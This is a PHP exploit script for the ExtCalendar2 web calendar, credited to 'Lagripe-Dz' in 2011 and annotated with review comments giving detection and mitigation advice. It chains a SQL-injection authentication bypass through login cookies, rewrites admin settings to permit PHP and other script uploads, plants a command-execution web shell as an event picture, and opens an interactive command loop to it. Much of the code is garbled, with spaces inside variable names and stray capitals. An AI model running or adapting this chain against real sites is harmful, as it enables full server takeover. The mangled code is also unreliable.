<?
# NOTE(review): historical proof-of-concept (dated 2011 in the banner below) for an
# ExtCalendar2 cookie-based authentication bypass. As pasted, the text is not runnable
# PHP (variable names contain spaces, e.g. "$ Argv") and it relies on eregi(), which was
# removed from PHP 7; it is kept here for defensive analysis of the attack chain.
If (! $ Argv [1])
Die ("
Usage: php exploit. php [site]
Example: php exploit. php http://www.bkjia.com/calendar/
");
Print_r ("
# Exploit...: [ExtCalendar2 (Auth Bypass/Cookie) SQL Injection]
# Author...: [Lagripe-Dz]
# Date ......: [05-o6-2o11]
# Twitter...: [@ Lagripe_Dz]
# HoMe ......: [Sec4Ever.com & Lagripe-Dz.org]
# Download ..: [http://sourceforge.net/projects/extcal/]
# Video...: [http://www.youtube.com/watch? V = 2aatog92oqU]
-= [ExPloiT] =-
Javascript: document. cookie = \ "ext20_username = admin' or '1' = '1 \";
Javascript: document. cookie = \ "ext20_password = admin' or '1' = '1 \";
-= [Start] =-
");
$ Target = $ argv [1];
If (! Extension_loaded ("curl") {die ("error: cURL extension required ");}
# First get cookie prefix from page source (xxx_username by default> ext20_username)
Preg_match_all ('# extcal_cookie_id = "(. *)" #', DzCURL ($ target, 0, 0), $ prf );
$ Prefix = $ prf [1] [0];
# Header ..
# NOTE(review): the cookie is the whole attack. A quoted tautology is placed in the
# username/password cookies, which implies the application concatenates cookie contents
# into its login query. Application-side fix: parameterised queries, and never treat a
# client-supplied cookie value as proof of identity (use a server-side session instead).
$ Header [] = "Cookie :". $ prefix. "_ username = admin' or '1' = '1 ;". $ prefix. "_ password = admin' or '1' = '1 ;";
# Check if it worked by looking for [logout]
Echo (eregi ("logout", DzCURL ($ target, 0, $ header )))? "# Login: D \ n": die ("# Failed: Can't Login ");
# Data of new settings with allowed php extension
# NOTE(review): once logged in, the admin settings form is resubmitted with
# "allowed_file_extensions" widened to server-side script types. Detection: alert on
# changes to this setting; mitigation: a server-side allow-list of image types and
# no script execution permitted in the upload directory.
$ New_settings = Array (
"Calendar_name" => "Calendar name", "calendar_description" => "Calendar description ",
"Calendar_admin_email" => "Calendar Administrator email", "cookie_name" => "ext20 ",
"Cookie_path" => "/", "debug_mode" => 1, "calendar_status" => 1, "lang" => "english ",
"Charset" => "language-file", "theme" => "default", "timezone" => 1, "time_format_24hours" => 1,
"Auto_daylight_saving" => 1, "main_table_width" => "50%", "day_start" => 1, "default_view" => 1,
"Search_view" => 1, "archive" => 1, "events_per_page" => 5, "sort_order" => "ta ",
"Show_recurrent_events" => 1, "multi_day_events" => "all", "legend_cat_columns" => 5,
"Allow_user_regiils" => 1, "reg_duplicate_emails" => 1, "reg_email_verify" => 1,
"Popup_event_mode" => 1, "popup_event_width" => 1, "popup_event_height" => 1,
"Add_event_view" => 1, "addevent_allow_html" => 1, "addevent_allow_contact" => 1,
"Addevent_allow_email" => 1, "addevent_allow_url" => 1, "addevent_allow_picture" => 1,
"New_post_notification" => 1, "monthly_view" => 1, "cal_view_show_week" => 1,
"Cal_view_max_chars" => 100, "flyer_view" => 1, "flyer_show_picture" => 1,
"Flyer_view_max_chars" => 100, "weekly_view" => 1, "weekly_view_max_chars" => 100,
"Daily_view" => 1, "daily_view_max_chars" => 100, "cats_view" => 1, "cats_view_max_chars" => 100,
"Mini_cal_def_picture" => 1, "mini_cal_diplay_options" => "default", "mail_method" => "smtp ",
"Mail_smtp_host" => 0, "mail_smtp_auth" => 1, "mail_smtp_username" => 0, "mail_smtp_password" => 0,
"Max_upl_dim" => 99999999999999999, "max_upl_size" => 99999999999999999, "picture_chmod" => 755,
"Allowed_file_extensions" => "PHP/PY/PERL/HTACCESS/ASP/ASPX", "update_config" => "Save New Configuration ");
# Post data and check if settings updated and php added
Echo (eregi ("<strong>. * </strong>", DzCURL ($ target. "admin_settings.php", $ new_settings, $ header )))? "# Settings Updated: D \ n": die ("# Failed: can't update settings ");
# Get event id for connect 2 backdoor
$ Events = DzCURL ($ target. "admin_events.php? Eventfilter = 0 ", 0, $ header );
Preg_match_all ('# edit & id = (:? [0-9] +) # ', $ events, $ r );
# Backdoor xD
# NOTE(review): the string below is a command-execution web shell that is written to
# dz.php and attached to an existing event as its "picture" further down.
$ Bd = "<?
Echo Exe (base64_decode (\ $ _ GET [dz]);
Function Exe (\ $ command)
{
If (function_exists ('passthru') {\ $ exec = passthru (\ $ command );}
Elseif (function_exists ('system ')&&! \ $ Exec) {\$ exec = system (\ $ command );}
Elseif (function_exists ('exec ')&&! \ $ Exec) {exec (\ $ command, \ $ output); \ $ exec = join (\ "\ n \", \ $ output );}
Elseif (function_exists ('Shell _ exec ')&&! \ $ Exec) {\$ exec = shell_exec (\ $ command );}
Elseif (function_exists ('popen ')&&! \ $ Exec) {\ $ fp = popen (\ $ command, \ "r \");
{While (! Feof (\ $ fp) {\ $ result. = fread (\ $ fp, 1024) ;}pclose (\ $ fp) ;}\$ exec = convert_cyr_string (\ $ result, \ "d \", \ "w \");}
Elseif (function_exists ('win _ shell_execute ')&&! \ $ Exec) {\$ exec = winshell (\ $ command );}
Elseif (function_exists ('win32 _ create_service ')&&! \ $ Exec) {\$ exec = srvshell (\ $ command );}
Elseif (extension_loaded ('ffi ')&&! \ $ Exec) {\$ exec = ffishell (\ $ command );}
Elseif (extension_loaded ('perl ')&&! \ $ Exec) {\$ exec = perlshell (\ $ command );}
Elseif (! \ $ Exec) {\$ exec = slashBypass (\ $ command );}
Elseif (! \ $ Exec & extension_loaded ('python '))
{\ $ Exec = python_eval (\ "import OS
Pwd = OS. getcwd ()
Print pwd
OS. system ('\ ". \ $ command .\"')\");}
Elseif (\ $ exec) {return \ $ exec ;}
}
?> ";
# Make bd
File_put_contents ("dz. php", $ bd );
# New event with php backdoor
$ Post_bd = array (
"Mode" => "edit", "id" => $ r [1] [0], "title" => "blabla ",
"Description" => "bla,", "cat" => 1,
"Day" => 22, "month" => 11," year "=> 2011,
"Picture" => "@". realpath ("dz. php "),
"Submit" => "Update Event ");
# Post backdoor & check
Echo (! Eregi ("<strong> Errors </strong>", DzCURL ($ target. "admin_events.php", $ post_bd, $ header )))? "# Backdoor uploaded: D \ n": die ("# Failed: can't upload Backdoor ");
@ Unlink ("dz. php"); # del backdoor after uploading
# Looking for backdoor
# NOTE(review): the uploaded file lands under upload/ with a random prefix and the
# "_dz.php" suffix - a concrete filesystem indicator for incident response.
Preg_match_all ('# upload /(:? [A-z0-9] +) _ dz. php # ', DzCURL ($ target. "admin_events.php? Mode = view & id = ". $ r [1] [0], 0, $ header), $ r2 );
Echo (! $ R2 [0] [0])? Die ("# Failed: Backdoor not found! "):"";
# Connecting with backdoor: P
# NOTE(review): each command is sent base64-encoded in the "dz" query parameter.
# Web-server access logs showing requests to upload/*_dz.php carrying a "dz=" parameter
# are a detection signal for this chain.
While (1 ){
Fwrite (STDOUT, "\ ncmd ~ #");
// (Trim (fgets (STDIN) = "exit ")? Exit: ""; // exit from loop
$ Cmd = base64_encode (trim (fgets (STDIN ))));
Echo DzCURL ($ target. $ r2 [0] [0]. "? Dz = ". $ cmd, 0, 0 );
}
# Function...
/**
 * Minimal cURL helper: issues a GET, or a POST when $posts is an array,
 * and returns the raw response body.
 *
 * @param string    $url    Absolute URL to request.
 * @param array|int $posts  POST fields (array) or a non-array (e.g. 0) for a plain GET.
 * @param array|int $header Extra request headers (array) or a non-array for none.
 * @return string|false Response body (CURLOPT_RETURNTRANSFER), or false if curl_exec() fails.
 */
function DzCURL($url, $posts, $header)
{
    $handle = curl_init();

    $options = [
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_URL => $url,
        CURLOPT_USERAGENT => 'mozilla/5.0 (Windows NT 5.1; rv: 2.0.1) Gecko/20100101 Firefox/4.0.1 DzCURL = )',
        CURLOPT_FOLLOWLOCATION => 1,
        // Hard 5-second cap so an unresponsive host cannot hang the caller.
        CURLOPT_TIMEOUT => 5,
    ];

    // Headers and POST body are optional; a non-array means "not supplied".
    if (is_array($header)) {
        $options[CURLOPT_HTTPHEADER] = $header;
    }
    if (is_array($posts)) {
        $options[CURLOPT_POST] = 1;
        $options[CURLOPT_POSTFIELDS] = $posts;
    }

    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    curl_close($handle);

    return $body;
}
# _ EOF
?>